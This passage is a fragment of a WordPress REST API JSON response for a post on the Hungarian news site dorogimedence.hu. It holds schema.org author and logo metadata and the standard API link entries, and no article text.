H\u00edrport\u00e1l"},"image":{"@id":"https:\/\/dorogimedence.hu\/#\/schema\/logo\/image\/"},"sameAs":["https:\/\/www.facebook.com\/dorogimedence\/"]},{"@type":"Person","@id":"https:\/\/dorogimedence.hu\/#\/schema\/person\/ce6091eeb7e95ecdc87890d6aa8e0fd4","name":"dorogimedence.hu","image":{"@type":"ImageObject","inLanguage":"hu","@id":"\/\/www.gravatar.com\/avatar\/d8d45f8901aadff40a4af72c0b826f1d?s=96&#038;r=g&#038;d=mm","url":"\/\/www.gravatar.com\/avatar\/d8d45f8901aadff40a4af72c0b826f1d?s=96&#038;r=g&#038;d=mm","contentUrl":"\/\/www.gravatar.com\/avatar\/d8d45f8901aadff40a4af72c0b826f1d?s=96&#038;r=g&#038;d=mm","caption":"dorogimedence.hu"}}]}},"_links":{"self":[{"href":"https:\/\/dorogimedence.hu\/index.php\/wp-json\/wp\/v2\/posts\/57238","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/dorogimedence.hu\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/dorogimedence.hu\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/dorogimedence.hu\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/dorogimedence.hu\/index.php\/wp-json\/wp\/v2\/comments?post=57238"}],"version-history":[{"count":0,"href":"https:\/\/dorogimedence.hu\/index.php\/wp-json\/wp\/v2\/posts\/57238\/revisions"}],"wp:attachment":[{"href":"https:\/\/dorogimedence.hu\/index.php\/wp-json\/wp\/v2\/media?parent=57238"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/dorogimedence.hu\/index.php\/wp-json\/wp\/v2\/categories?post=57238"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/dorogimedence.hu\/index.php\/wp-json\/wp\/v2\/tags?post=57238"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}